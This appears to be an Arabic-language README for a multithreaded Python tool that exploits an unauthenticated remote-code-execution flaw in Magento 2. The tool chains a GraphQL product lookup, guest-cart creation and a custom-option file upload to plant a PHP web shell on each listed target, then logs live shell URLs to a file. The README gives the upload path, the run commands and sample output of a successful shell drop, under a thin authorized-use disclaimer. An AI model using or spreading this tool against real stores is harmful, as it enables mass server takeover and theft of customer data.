
Magento 2 استغلال RCE غير مصادق عليه – يرفع قشرة ويب PHP عبر البحث عن المنتجات في GraphQL + خيارات سلة الضيف المخصصة. متعدد الخيوط، يكتشف SKU تلقائيًا، ويحفظ عناوين URL للقذائف الحية إلى up.txt. لأغراض اختبار الأمان المصرَّح به فقط.
⚠️ هذه الأداة مخصصة للاختبار الأمني التعليمي والمصرح به فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها غير قانوني.
يستهدف هذا الاستغلال ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) غير المصادق عليها في Magento 2 (Adobe Commerce). من خلال ربط استعلام منتج GraphQL، وإنشاء سلة ضيف، ورفع ملف خبيث عبر خيارات المنتج المخصصة، يمكن للمهاجم رفع قشرة ويب PHP والحصول على تنفيذ عشوائي للتعليمات البرمجية على الخادم المستهدف.
تسمح الثغرة لمهاجم عن بُعد بكتابة ملف PHP إلى نظام ملفات الخادم، ثم الوصول إليه لتنفيذ أوامر النظام، وقراءة/كتابة الملفات، والاختراق الكامل لتثبيت Magento.
Shinday)up.txt/graphql./rest/default/V1/guest-carts/rest/default/V1/guest-carts/{cart_id}/items مع قشرة ويب PHP مشفرة بـ base64 كملف خيار مخصص./pub/media/custom_options/quote/... أو /media/custom_options/quote/....Shinday في الاستجابة.up.txt.Queue و unicode ووحدات أخرى خاصة بـ Python 2)requests و urllib3تثبيت التبعيات:
pip install requests urllib3
python exploit.py <list.txt>
<list.txt> – ملف يحتوي على روابط الأهداف الأساسية (رابط في كل سطر)، مع أو بدون http:///https://.https://example.com
http://shop.test
magento2.target.net
up.txt في الدليل الحالي.python exploit.py targets.txt
[*] Total targets: 5
[*] Start time: 2025-03-15 12:00:00
[*] Starting 5 threads...
[Thread 1] Processing: https://example.com
[+] SKU : 24-WG080
[+] CART : 8f7c3e9a-1b2f-4d5e-9a8b-7c6d5e4f3a2b
[+] Upload Status : 200
[+] Webshell terpasang: https://example.com/pub/media/custom_options/quote/a1/b2/shell_xyz.php
[✓] Saved to up.txt: https://example.com/pub/media/custom_options/quote/a1/b2/shell_xyz.php
ملف PHP المرفوع هو مدير ملفات بسيط (يُسمى مثل xxxxx_shin.php) يستجيب للطلبات بمستكشف ملفات قائم على الويب. يحتوي على العلامة الفريدة Shinday التي يستخدمها البرنامج النصي للتحقق من نجاح الرفع.
لا تترك هذه القشرة على أي نظام بعد الاختبار – قم بالتنظيف فورًا.
/media/custom_options/ بحثًا عن ملفات PHP غير متوقعة.هذا البرنامج مقدم لأغراض التعليم واختبار الاختراق المصرح به فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. يجب الحصول على إذن كتابي صريح من مالك النظام قبل تشغيل هذا الاستغلال ضد أي هدف. الوصول غير المصرح به إلى أنظمة الكمبيوتر جريمة جنائية في معظم الولايات القضائية.
لمزيد من إخلاء المسؤولية، يمكنك الاطلاع على إخلاء المسؤولية على غلاف Jenderal92. يمكنك التحقق منه هنا !!!